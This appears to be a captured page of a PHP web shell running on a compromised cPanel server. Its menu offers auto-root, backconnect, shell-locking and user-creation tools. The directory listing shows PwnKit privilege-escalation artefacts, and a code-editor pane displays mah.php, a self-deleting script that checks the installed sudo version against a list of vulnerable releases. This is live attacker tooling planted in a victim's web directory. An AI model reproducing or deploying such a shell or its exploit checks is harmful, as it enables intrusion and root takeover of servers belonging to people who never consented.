Linux cpanel.rrshost.in 5.15.0-25-generic #25-Ubuntu SMP Wed Mar 30 15:54:22 UTC 2022 x86_64
Apache
: 109.123.238.221 | : 172.69.214.199
138 Domain
8.2.28
aev999
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
CREATE RDP
PHP Mailer
BACKCONNECT
HASH IDENTIFIER
README
+ Create Folder
+ Create File
/
home /
aev999 /
public_html /
verifyclick.info /
[ HOME SHELL ]
Name
Size
Permission
Action
.pkexec
[ DIR ]
drwxr-xr-x
.well-known
[ DIR ]
drwxr-xr-x
GCONV_PATH=.
[ DIR ]
drwxr-xr-x
cgi-bin
[ DIR ]
drwxr-xr-x
wp-adriv
[ DIR ]
drwxr-xr-x
.htaccess
2
KB
-rw-r--r--
.mad-root
0
B
-rw-r--r--
.user.ini
575
B
-rw-r--r--
admin.php
5.22
KB
-rw-r--r--
adminer.php
465.43
KB
-rw-r--r--
error_log
15.02
KB
-rw-r--r--
mah.php
428
B
-rw-r--r--
php.ini
631
B
-rw-r--r--
pwnkit
10.99
KB
-rwxr-xr-x
shoyo.php
0
B
-r--r--r--
Delete
Unzip
Zip
${this.title}
Close
Code Editor : mah.php
<?php $sudo_version = trim(shell_exec("sudo --version | sed -n 's/^Sudo version \\([0-9.]*p*[0-9]*\\)/\\1/p'")); $vulnerable = [ "1.9.14", "1.9.14p1", "1.9.14p2", "1.9.14p3", "1.9.14p4", "1.9.14p5", "1.9.15", "1.9.15p1", "1.9.15p2", "1.9.15p3", "1.9.15p4", "1.9.15p5", "1.9.16", "1.9.16p1", "1.9.16p2", "1.9.17" ]; if (in_array($sudo_version, $vulnerable)) { echo "[+]okkkk\n"; } else { } @unlink('mah.php'); ?>
Close